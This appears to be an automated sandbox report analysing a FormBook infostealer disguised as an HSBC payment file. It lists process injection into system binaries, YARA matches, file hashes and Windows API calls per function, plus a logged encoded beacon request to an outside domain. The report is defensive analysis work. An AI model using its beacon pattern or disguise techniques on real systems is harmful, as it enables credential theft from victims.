Oct 22, 2024 05:40:49.554302931 CEST	415	OUT	GET /g3wl/?kT9p=1CI2rntFLoR8LORJomanxZlvrsXZ8iOzXp0hteFUX7ZC4CpkEd9LFXVMj4GYlfKx8LXJCAGhhNbTKAnE5hN2yzgMyKEEG9EdyQR/qyvuetkdr/L/NuFg5/mzu6W7tc33QTvsPJE=&in1Hf=rx3dZnMxlRvDbR HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.donante-de-ovulos.biz Connection: close User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
Oct 22, 2024 05:40:50.204662085 CEST	1236	IN	HTTP/1.1 200 OK date: Tue, 22 Oct 2024 03:40:49 GMT content-type: text/html; charset=utf-8 content-length: 1546 x-request-id: 949b0cb5-53ff-409d-ba84-eac38cddbfab cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_QcKuSBJ+rx+nhfq32v/J4j91ManMrXLl6IlLlsNRJeNb9G5T1OuyDh5y+MB2TOLELyXo4akBdQ547d+z88Ygjw== set-cookie: parking_session=949b0cb5-53ff-409d-ba84-eac38cddbfab; expires=Tue, 22 Oct 2024 03:55:50 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 51 63 4b 75 53 42 4a 2b 72 78 2b 6e 68 66 71 33 32 76 2f 4a 34 6a 39 31 4d 61 6e 4d 72 58 4c 6c 36 49 6c 4c 6c 73 4e 52 4a 65 4e 62 39 47 35 54 31 4f 75 79 44 68 35 79 2b 4d 42 32 54 4f 4c 45 4c 79 58 6f 34 61 6b 42 64 51 35 34 37 64 2b 7a 38 38 59 67 6a 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_QcKuSBJ+rx+nhfq32v/J4j91ManMrXLl6IlLlsNRJeNb9G5T1OuyDh5y+MB2TOLELyXo4akBdQ547d+z88Ygjw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Oct 22, 2024 05:40:50.204727888 CEST	999	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOTQ5YjBjYjUtNTNmZi00MDlkLWJhODQtZWFjMzhjZGRiZmFiIiwicGFnZV90aW1lIjoxNzI5NTY4ND

Target ID:	0
Start time:	23:37:52
Start date:	21/10/2024
Path:	C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe"
Imagebase:	0x720000
File size:	1'179'648 bytes
MD5 hash:	6BA55B78696072EA7F7F56C955FE1C0B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	23:37:53
Start date:	21/10/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe"
Imagebase:	0x380000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2378537810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2378537810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2378859545.0000000003760000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2378859545.0000000003760000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2379212098.0000000004000000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2379212098.0000000004000000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	23:38:12
Start date:	21/10/2024
Path:	C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe"
Imagebase:	0xd60000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3956974013.00000000023D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3956974013.00000000023D0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	23:38:14
Start date:	21/10/2024
Path:	C:\Windows\SysWOW64\sdchange.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\sdchange.exe"
Imagebase:	0x3f0000
File size:	40'960 bytes
MD5 hash:	8E93B557363D8400A8B9F2D70AEB222B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3957510457.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3957510457.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3954264030.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3954264030.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3957685559.0000000004AF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3957685559.0000000004AF0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	23:38:27
Start date:	21/10/2024
Path:	C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe"
Imagebase:	0xd60000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3959254630.0000000005510000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3959254630.0000000005510000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	23:38:39
Start date:	21/10/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff728280000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.4%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	7.5%
Total number of Nodes:	2000
Total number of Limit Nodes:	166

Executed Functions

Function 00723B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00723B68
IsDebuggerPresent.KERNEL32 ref: 00723B7A
GetFullPathNameW.KERNEL32(00007FFF,?,?,007E52F8,007E52E0,?,?), ref: 00723BEB

Part of subcall function 00727BCC: _memmove.LIBCMT ref: 00727C06

Part of subcall function 0073092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00723C14,007E52F8,?,?,?), ref: 0073096E

SetCurrentDirectoryW.KERNEL32(?), ref: 00723C6F
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,007D7770,00000010), ref: 0075D281
SetCurrentDirectoryW.KERNEL32(?,007E52F8,?,?,?), ref: 0075D2B9
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,007D4260,007E52F8,?,?,?), ref: 0075D33F
ShellExecuteW.SHELL32(00000000,?,?), ref: 0075D346

Part of subcall function 00723A46: GetSysColorBrush.USER32(0000000F), ref: 00723A50
Part of subcall function 00723A46: LoadCursorW.USER32(00000000,00007F00), ref: 00723A5F
Part of subcall function 00723A46: LoadIconW.USER32(00000063), ref: 00723A76
Part of subcall function 00723A46: LoadIconW.USER32(000000A4), ref: 00723A88
Part of subcall function 00723A46: LoadIconW.USER32(000000A2), ref: 00723A9A
Part of subcall function 00723A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00723AC0
Part of subcall function 00723A46: RegisterClassExW.USER32(?), ref: 00723B16

Part of subcall function 007239D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00723A03
Part of subcall function 007239D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00723A24
Part of subcall function 007239D5: ShowWindow.USER32(00000000,?,?), ref: 00723A38
Part of subcall function 007239D5: ShowWindow.USER32(00000000,?,?), ref: 00723A41

Part of subcall function 0072434A: _memset.LIBCMT ref: 00724370
Part of subcall function 0072434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00724415

Strings

This is a third-party compiled AutoIt script., xrefs: 0075D279
%{, xrefs: 00723C44
runas, xrefs: 0075D33A

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas$%{
API String ID: 529118366-1872128065
Opcode ID: cf9516382bcdb52598b18289481b6d0e0309d3a7e8b187f80b5d0128591cb2e2
Instruction ID: 3b8270cbb40f97214918419e2b3e54db905e6d0fed3c90668dae75bed2331b77
Opcode Fuzzy Hash: cf9516382bcdb52598b18289481b6d0e0309d3a7e8b187f80b5d0128591cb2e2
Instruction Fuzzy Hash: 3A5123B0D0919CEACF15EBB4EC49AED7B7CBB49304F008069F511AA1A2DA7C5A45CB24

Function 007249A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 007249CD

Part of subcall function 00727BCC: _memmove.LIBCMT ref: 00727C06

GetCurrentProcess.KERNEL32(?,007AFAEC,00000000,00000000,?), ref: 00724A9A
IsWow64Process.KERNEL32(00000000), ref: 00724AA1
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00724AE7
FreeLibrary.KERNEL32(00000000), ref: 00724AF2
GetSystemInfo.KERNEL32(00000000), ref: 00724B23
GetSystemInfo.KERNEL32(00000000), ref: 00724B2F

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: 9cd2123e35244b6c3c40011b71bfe8d85f0df982b5ecd84166f02a0cb5b86c6a
Instruction ID: 81ec18d21dc61774274221fd3356f877e97795039c2d7c00619342e6a17d2e76
Opcode Fuzzy Hash: 9cd2123e35244b6c3c40011b71bfe8d85f0df982b5ecd84166f02a0cb5b86c6a
Instruction Fuzzy Hash: 6991C3319897D0DEC731CB7899501AABFF5AF2A301B448DAED0CB93A41D268B90CC75D

Function 00724E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00724D8E,?,?,00000000,00000000), ref: 00724E99
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00724D8E,?,?,00000000,00000000), ref: 00724EB0
LoadResource.KERNEL32(?,00000000,?,?,00724D8E,?,?,00000000,00000000,?,?,?,?,?,?,00724E2F), ref: 0075D937
SizeofResource.KERNEL32(?,00000000,?,?,00724D8E,?,?,00000000,00000000,?,?,?,?,?,?,00724E2F), ref: 0075D94C
LockResource.KERNEL32(00724D8E,?,?,00724D8E,?,?,00000000,00000000,?,?,?,?,?,?,00724E2F,00000000), ref: 0075D95F

Strings

SCRIPT, xrefs: 00724EA6

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: de71a33e8c1634b3a33f40619980224692aac90ab0cb993d0da395685227b88d
Instruction ID: 3863c95184892e18c733abffd6c6401f735c11e07670f8d33ae73945a7cf2990
Opcode Fuzzy Hash: de71a33e8c1634b3a33f40619980224692aac90ab0cb993d0da395685227b88d
Instruction Fuzzy Hash: 01115E75640700BFE7318BA5EC48F677BBAFBC6B11F108268F405C6290DB65EC008A60

Function 0072E6A0 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 00763E62
Dd~, xrefs: 0072EAC1
Dd~, xrefs: 00763B2E
Dd~, xrefs: 00763AF5
Dd~, xrefs: 0072EABA

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID:
String ID: Dd~$Dd~$Dd~$Dd~$Variable must be of type 'Object'.
API String ID: 0-4039284102
Opcode ID: 22b38bdb3146a3af931bd8b5b1576460a595663dfbd18685d01e58e3ddd86fc5
Instruction ID: b28f584376fc6b065953d1a1a1c0b37c38555728ee90c09cb9441b7ea3c115fb
Opcode Fuzzy Hash: 22b38bdb3146a3af931bd8b5b1576460a595663dfbd18685d01e58e3ddd86fc5
Instruction Fuzzy Hash: 01A29075A00225CFCF24CF54E484AAEB7B2FF59310F648069E946AB351D739ED82CB91

Function 0078445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,0075E398), ref: 0078446A
FindFirstFileW.KERNELBASE(?,?), ref: 0078447B
FindClose.KERNEL32(00000000), ref: 0078448B

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 220ac3b1b88d8e86f35318d358b0b37582d175fae68993b37e001d84f9bb503b
Instruction ID: 3a7a88063e024cdf1b8facde731bc3257ece976205129b0125b6c7690aed0d1a
Opcode Fuzzy Hash: 220ac3b1b88d8e86f35318d358b0b37582d175fae68993b37e001d84f9bb503b
Instruction Fuzzy Hash: 7FE0D8324105416742107B78EC0D9ED7B9CAE46335F104715F839C10E0E7FC5D009699

Function 007309D0 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00730A5B
timeGetTime.WINMM ref: 00730D16
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00730E53
Sleep.KERNEL32(0000000A), ref: 00730E61
LockWindowUpdate.USER32(00000000,?,?), ref: 00730EFA
DestroyWindow.USER32 ref: 00730F06
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00730F20
Sleep.KERNEL32(0000000A,?,?), ref: 00764E83
TranslateMessage.USER32(?), ref: 00765C60
DispatchMessageW.USER32(?), ref: 00765C6E
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00765C82

Strings

pb~, xrefs: 00765003
pb~, xrefs: 007657B4
pb~, xrefs: 00764F59
@TRAY_ID, xrefs: 0076578F
@GUI_CTRLID, xrefs: 00764F3A
@GUI_CTRLHANDLE, xrefs: 00764FE4
@GUI_WINHANDLE, xrefs: 00764F8F
pb~, xrefs: 00764FAE
@COM_EVENTOBJ, xrefs: 007654F0

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pb~$pb~$pb~$pb~
API String ID: 4212290369-878677322
Opcode ID: 95a561f43de689386c22c86679318b9cece77190383724ee15cb4ab27463d385
Instruction ID: 9cf2049ce99887793043cccaf6549189d32593f85c389f7652746634db4723cf
Opcode Fuzzy Hash: 95a561f43de689386c22c86679318b9cece77190383724ee15cb4ab27463d385
Instruction Fuzzy Hash: CAB2E870608741DFD724DF24C898BAAB7E4BF85304F14891DF98A97292CB7DE844DB92

Function 00789155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00788F5F: __time64.LIBCMT ref: 00788F69

Part of subcall function 00724EE5: _fseek.LIBCMT ref: 00724EFD

__wsplitpath.LIBCMT ref: 00789234

Part of subcall function 007440FB: __wsplitpath_helper.LIBCMT ref: 0074413B

_wcscpy.LIBCMT ref: 00789247
_wcscat.LIBCMT ref: 0078925A
__wsplitpath.LIBCMT ref: 0078927F
_wcscat.LIBCMT ref: 00789295
_wcscat.LIBCMT ref: 007892A8

Part of subcall function 00788FA5: _memmove.LIBCMT ref: 00788FDE
Part of subcall function 00788FA5: _memmove.LIBCMT ref: 00788FED

_wcscmp.LIBCMT ref: 007891EF

Part of subcall function 00789734: _wcscmp.LIBCMT ref: 00789824
Part of subcall function 00789734: _wcscmp.LIBCMT ref: 00789837

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00789452
_wcsncpy.LIBCMT ref: 007894C5
DeleteFileW.KERNEL32(?,?), ref: 007894FB
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00789511
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00789522
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00789534

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: dda93e91e6fa962985e4ad54b2173dc75b7ec74559ea27af85ad28a5f32716a9
Instruction ID: 5e5046983d81d8edc89a42ddf57622ba22b7eb8b1558eb64bb22d3cc84bbf90b
Opcode Fuzzy Hash: dda93e91e6fa962985e4ad54b2173dc75b7ec74559ea27af85ad28a5f32716a9
Instruction Fuzzy Hash: 91C15DB1D40129AADF21EF95CC85AEEB7BCEF85310F0440A6F609E6141EB349A448F65

Function 0072301C Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00723074
RegisterClassExW.USER32(00000030), ref: 0072309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007230AF
InitCommonControlsEx.COMCTL32(?), ref: 007230CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007230DC
LoadIconW.USER32(000000A9), ref: 007230F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00723101

Strings

TaskbarCreated, xrefs: 007230A4
+, xrefs: 0072305D
AutoIt v3 GUI, xrefs: 00723090
0, xrefs: 00723056

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 150654a7ede0b153be26da6f2ae6f5da8f45e3d0951073121f08a06c05403d81
Instruction ID: e1f74feeb0c73d1e0031be90233c1b92c527f0564f8d1489484de32817bd4d0c
Opcode Fuzzy Hash: 150654a7ede0b153be26da6f2ae6f5da8f45e3d0951073121f08a06c05403d81
Instruction Fuzzy Hash: FC3118B1901359EFDB508FE4EC89ADABBF4FB09314F14812AE540EA2A1D3B90541CF95

Function 00723041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

